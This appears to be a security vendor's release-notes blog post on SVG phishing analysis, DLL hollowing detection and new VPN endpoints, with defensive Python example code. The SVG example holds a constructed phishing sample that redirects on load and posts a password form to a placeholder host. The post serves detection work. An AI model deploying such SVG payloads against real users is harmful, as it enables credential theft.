Introduction
The first release of 2025 is already behind us, but we’re just getting started. We hope you’ve enjoyed the features delivered in recent months, including searchable threat names, clipboard access detection, enhanced LNK analysis, and residential traffic support via Geofence VPN in Cloud instances.
Now, we’re happy to share the next round of updates to the VMRay Platform and give you a glimpse into what’s to come. Let’s dive into the details!
Picture This – SVG File Analysis is on!
Recently, our Labs team has observed a growing trend in phishing attacks that exploit SVG files, often delivered as email attachments. In a typical phishing campaign using SVGs, the attached file either tricks users into clicking a malicious link or displays a fake login form to steal credentials.
Historically, SVG files haven’t been widely used in cyberattacks, which means many security solutions lacked robust support for scanning them, allowing these threats to slip through undetected. Moreover, SVG attachments in emails are uncommon, making them both suspicious and surprisingly effective for attackers.
Why are SVGs attractive to threat actors?
Unlike traditional image formats (PNG, JPG), SVGs are XML documents, meaning they can contain embedded scripts and links, which makes them well suited to obfuscation and phishing tactics.
Phishing via embedded links: attackers can hide malicious URLs inside the file.
JavaScript-based payloads: malicious scripts can execute when the SVG is opened in a browser.
Lower detection rates: SVGs are less likely to be flagged by security tools compared to PDFs and DOCX files.
On top of that, there are no execution warnings: unlike macros in DOCX or EXE files, opening an SVG typically doesn’t alert the user.
With that in mind, we’re happy to announce that the VMRay Platform now supports SVG file analysis, enabling static, web, and reputation analysis. Try it out today and uncover the true nature of your SVG files.
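As an added illustration of the static side of that analysis (this is example code written for this post, not VMRay’s own implementation), the script below parses an SVG as the XML document it is and reports the content classes described above: inline `<script>` elements, event-handler attributes such as `onload`, `javascript:`/`data:` URIs, external `http(s)` links, and HTML forms smuggled in through `<foreignObject>`. The two SVG documents at the bottom are constructed samples; the hostnames in them are placeholders.

```python
import xml.etree.ElementTree as ET

# Attributes that make a browser run script while rendering the SVG.
SCRIPT_EVENT_ATTRS = {"onload", "onclick", "onerror", "onmouseover", "onbegin", "onend"}
# URI schemes that carry script or inline content rather than a plain link.
SCRIPT_URI_SCHEMES = {"javascript", "data", "vbscript"}


def local_name(qualified):
    """Strip an XML namespace prefix of the form '{uri}name'."""
    return qualified.rsplit("}", 1)[-1]


def inspect_svg(svg_text):
    """Return a list of (kind, detail) findings for one SVG document.

    ElementTree keeps the example dependency-free; for untrusted attachments,
    parse with defusedxml (same API) so entity-expansion tricks are rejected too.
    """
    findings = []
    root = ET.fromstring(svg_text)
    for el in root.iter():
        name = local_name(el.tag)
        if name == "script":
            findings.append(("inline-script", (el.text or "").strip()[:80]))
        elif name == "foreignObject":
            findings.append(("foreign-object", "HTML content embedded in SVG"))
        elif name in ("form", "input", "iframe"):
            findings.append(("html-element", f"<{name}> inside SVG"))
        for attr, value in el.attrib.items():
            aname = local_name(attr)
            scheme = value.split(":", 1)[0].strip().lower() if ":" in value else ""
            if aname in SCRIPT_EVENT_ATTRS:
                findings.append(("event-handler", f"{aname}={value[:80]}"))
            elif aname in ("href", "action", "src"):
                if scheme in SCRIPT_URI_SCHEMES:
                    findings.append(("script-uri", value[:80]))
                elif scheme in ("http", "https"):
                    findings.append(("external-link", value))
    return findings


def classify(findings):
    """Collapse findings into a triage verdict."""
    kinds = {kind for kind, _ in findings}
    if kinds & {"inline-script", "event-handler", "script-uri", "html-element"}:
        return "suspicious"
    if kinds & {"external-link", "foreign-object"}:
        return "review"
    return "clean"


# Constructed sample: an ordinary icon with nothing but drawing primitives.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""

# Constructed sample in the style described above: redirect on load, a clickable
# link, an inline script and a credential form inside foreignObject.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="400" height="200" onload="location.href='https://example.invalid/login'">
  <a xlink:href="https://example.invalid/verify"><text x="10" y="40">Click to view document</text></a>
  <script>window.location = 'https://example.invalid/';</script>
  <foreignObject width="400" height="150">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://example.invalid/collect">
      <input name="password" type="password"/>
    </form>
  </foreignObject>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("phishing-style", SAMPLE_SVG)):
        found = inspect_svg(doc)
        print(f"{label}: {classify(found)}")
        for kind, detail in found:
            print(f"  {kind}: {detail}")
```

The verdict is deliberately coarse: a plain external link alone is common in legitimate SVG exports, so it only earns "review", whereas any script-bearing construct is enough for "suspicious". A static pass like this complements, rather than replaces, rendering the file in a browser, because obfuscated script can only be judged by what it does when run.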
SVG vs PNG/JPG security concerns
SVG file web analysis in the VMRay Platform
Enhanced Visibility into Advanced Injection Techniques: Spotting DLL Hollowing and beyond
This release also brings a major upgrade to our Dynamic Analysis engine, focused on detecting one of malware’s sneakiest tricks: DLL Hollowing and similar advanced code injection techniques.
What prompted the change?
Some advanced malware samples were bypassing our detection—and both we and our customers flagged the gaps. These threats leveraged techniques like stealthy process creation, thread manipulation, and remote code injection to evade visibility. Our existing monitoring logic didn’t fully capture the lower-level behaviors enabling these tactics.
What’s new?
We expanded our behavioral visibility to cover these stealthy tactics. Specifically, we now dynamically monitor system libraries when suspicious changes are detected, such as:
A system library being newly loaded into memory
Permissions of a module being altered (e.g., from read-only to executable)
Shellcode or modified content being written into the module
Execution jumping into those modified regions
This enhancement allows us to catch malware mid-act, even when it hides in plain sight inside legitimate system components, and it improves our ability to detect evasive threats like HijackLoader, which rely on sophisticated injection methods to avoid detection.
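To make the four observations listed above concrete, here is an added example (written for this post, not VMRay’s detection logic) that folds a stream of per-process memory events into a per-module state and raises severity as the hollowing chain progresses: a system library is loaded, its protection is changed to include execute, content is written into the mapped image, and execution then lands in that modified region. The event records and module names are constructed placeholders, not real telemetry; the event type names and the `OLD->NEW` protection format are assumptions of the example.

```python
from dataclasses import dataclass


@dataclass
class ModuleState:
    """What has been observed so far for one (process, module) pair."""
    loaded: bool = False
    made_executable: bool = False   # protection changed to include EXECUTE
    written: bool = False           # content written into the mapped image
    executed_after_write: bool = False


# Constructed event records (pid, event, module, detail); names are placeholders.
SAMPLE_EVENTS = [
    (4120, "module_load",    "C:\\Windows\\System32\\EXAMPLE_A.dll", "image mapped"),
    (4120, "protect_change", "C:\\Windows\\System32\\EXAMPLE_A.dll", "PAGE_READONLY->PAGE_EXECUTE_READWRITE"),
    (4120, "memory_write",   "C:\\Windows\\System32\\EXAMPLE_A.dll", "512 bytes into .text"),
    (4120, "execute",        "C:\\Windows\\System32\\EXAMPLE_A.dll", "thread start inside .text"),
    (5302, "module_load",    "C:\\Windows\\System32\\EXAMPLE_B.dll", "image mapped"),
    (5302, "protect_change", "C:\\Windows\\System32\\EXAMPLE_B.dll", "PAGE_READONLY->PAGE_READWRITE"),
    (5302, "memory_write",   "C:\\Windows\\System32\\EXAMPLE_B.dll", "8 bytes into .data"),
    (7001, "module_load",    "C:\\Windows\\System32\\EXAMPLE_C.dll", "image mapped"),
    (7001, "execute",        "C:\\Windows\\System32\\EXAMPLE_C.dll", "exported function call"),
]


def correlate(events):
    """Fold the event stream into per-(pid, module) states. Event order matters:
    only execution that follows a write into the same module counts."""
    states = {}
    for pid, kind, module, detail in events:
        st = states.setdefault((pid, module), ModuleState())
        if kind == "module_load":
            st.loaded = True
        elif kind == "protect_change":
            new_protection = detail.split("->")[-1].strip().upper()
            if "EXECUTE" in new_protection:
                st.made_executable = True
        elif kind == "memory_write":
            st.written = True
        elif kind == "execute" and st.written:
            # control transferred into a region this process modified earlier
            st.executed_after_write = True
    return states


def severity(st):
    if st.executed_after_write:
        return "high"      # full chain: image modified, then executed
    if st.written and st.made_executable:
        return "medium"    # image modified and made executable, not yet run
    if st.written or st.made_executable:
        return "low"       # a single unusual step, worth recording
    return "none"


def triage(events):
    """Return {(pid, module): severity} for every module seen in the stream."""
    return {key: severity(st) for key, st in correlate(events).items()}


def alerts(events, minimum="medium"):
    """Modules at or above the requested severity, sorted for stable output."""
    order = ["none", "low", "medium", "high"]
    return sorted(key for key, sev in triage(events).items()
                  if order.index(sev) >= order.index(minimum))


if __name__ == "__main__":
    for (pid, module), sev in triage(SAMPLE_EVENTS).items():
        print(f"pid {pid} {module}: {sev}")
```

Keeping the state per (process, module) rather than per event is what lets the detector fire mid-act: the "high" verdict for the first process is reached on the execute event, before the injected code has done anything observable at the network or file level, while the write into a data section in the second process stays at "low" because nothing was made executable and nothing ran from it.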
From Sydney to Stavanger: New VPN Endpoints on EU Cloud
Advanced malware often stays inactive until it detects it’s running in a specific region—using clues like IP geolocation, system language, or time zone. To help our customers stay one step ahead of these location-aware threats, we expanded our Geofence on the EU Cloud Platform.
The 2025.2 release adds three new Geofence VPN endpoints:
🇳🇴 Norway
🇵🇹 Portugal
🇦🇺 Australia
With these additions, customers can now simulate traffic from even more geographic regions while staying within the secure boundaries of the EU Cloud. This means:
Better evasion resistance
Broader malware detonation scenarios
More accurate threat intelligence from geo-targeted campaigns
These endpoints are now live and ready to use, giving you greater flexibility to detect, analyze, and respond to threats that rely on regional triggers.
New VPN endpoints on VMRay EU Cloud instances
Prioritized Live Interaction Analysis
Final Thoughts
As mentioned in the Live Interaction update, enhancing this feature remains our top priority; we’re committed to delivering a faster, more seamless experience so you can get the most out of every interactive analysis.
But that’s not all. We’re excited to give you a preview of what’s coming next: a new Threat Intelligence Feed by VMRay designed to deliver high-confidence, noise-free threat data. This marks a major step forward in our journey into the Cyber Threat Intelligence space. Delivered via TAXII 2.1 and supporting formats like STIX 2.1, JSON, CSV, and MISP Extended Format, our Threat Feed is built for easy integration into your existing security tools and workflows. Stay tuned—our marketing team will be sharing more details soon.
Wishing you a secure and productive May, and as always, thank you for being part of the VMRay community.